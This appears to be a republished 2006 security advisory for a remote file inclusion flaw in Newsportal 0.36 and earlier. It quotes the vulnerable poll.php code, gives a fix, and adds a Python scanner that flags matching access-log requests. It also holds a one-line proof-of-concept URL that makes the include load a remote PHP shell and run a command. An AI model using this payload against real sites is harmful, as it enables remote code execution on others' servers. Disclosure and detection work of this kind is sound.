Newsportal <= 0.36 Remote File Inclusion Vulnerability

2006.05.25
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

[+] Affected Software: Newsportal <= 0.36 + register_globals=on
[+] Vendor: http://florian-amrhein.de/newsportal
[+] Contact: philipp.niedziela@gmx.de
[+] Vuln discovered by: Florian Amrhein
[+] PoC by: Philipp Niedziela

// CODE [newsportal]/extras/poll/poll.php
--------------------------------------------
<?
// experimental!
// fills article-cache
$url=explode("/",$PATH_INFO);
$group=$url[1];
include "config.inc";
$title.= ' - '.$group;
include "head.inc";
?>

<a name="top"></a>
<h1 align="center"><?php echo $group; ?></h1>

<p>Lese Overview- und Artikeldaten ein...</p>

<?
// -----> VULN
include("$file_newsportal");
// <----- VULN
$ns=OpenNNTPconnection($server,$port);
flush();
if ($ns != false) {
  $headers = readOverview($ns,$group,1,true);
  closeNNTPconnection($ns);
}
?>

<p align="right"><a href="#top"><? echo $text_thread["button_top"];?></a></p>

<? include "tail.inc"; ?>
// CODE
--------------------------------------------

[+] PoC:
http://[url]/[pathtonewsportal]/extras/poll/poll.php?file_newsportal=http://localhost/phpshell.txt?cmd=uname -a

[+] Solution: Upgrade to 0.37 || del. [newsportal]/extras/poll/poll.php

[+] Greets: Lenni :)
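
A log check for the issue above, added here as an example and not part of the original advisory or of Newsportal: it flags access-log requests to extras/poll/poll.php that supply file_newsportal in the query string, since with register_globals=on that value reaches the include(). The log format, the sample entries and the names classify and scan are assumptions; access logs show only the query string, so values sent by POST or cookie are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined-format access-log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Value that would point include() at a remote resource or a PHP stream wrapper.
SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?|php|data):', re.I)
VULN_SCRIPT = "/extras/poll/poll.php"  # script named in the advisory
VULN_PARAM = "file_newsportal"         # variable passed to include()

def classify(line):
    """Return 'remote-include', 'param-override' or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # poll.php reads PATH_INFO, so a group name may follow the script path.
    if VULN_SCRIPT not in unquote(target.path):
        return None
    verdict = None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        # PHP rewrites '.' and ' ' in parameter names to '_' when registering them.
        if name.replace(".", "_").replace(" ", "_") != VULN_PARAM:
            continue
        if SCHEME_RE.match(value):
            return "remote-include"
        # Assumption: the client never has a legitimate reason to set this variable.
        verdict = "param-override"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line, 1-based."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v]

# Constructed sample entries (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/May/2006:10:00:01 +0200] "GET /newsportal/extras/poll/poll.php/de.test HTTP/1.1" 200 512',
    '192.0.2.44 - - [25/May/2006:10:02:13 +0200] "GET /newsportal/extras/poll/poll.php?file_newsportal=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 200 90',
    '192.0.2.44 - - [25/May/2006:10:02:40 +0200] "GET /newsportal/extras/poll/poll.php?file_newsportal=newsportal.php HTTP/1.0" 200 90',
    '192.0.2.7 - - [25/May/2006:10:03:00 +0200] "GET /newsportal/index.php?file_newsportal=x HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```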



Copyright 2017, cxsecurity.com

 
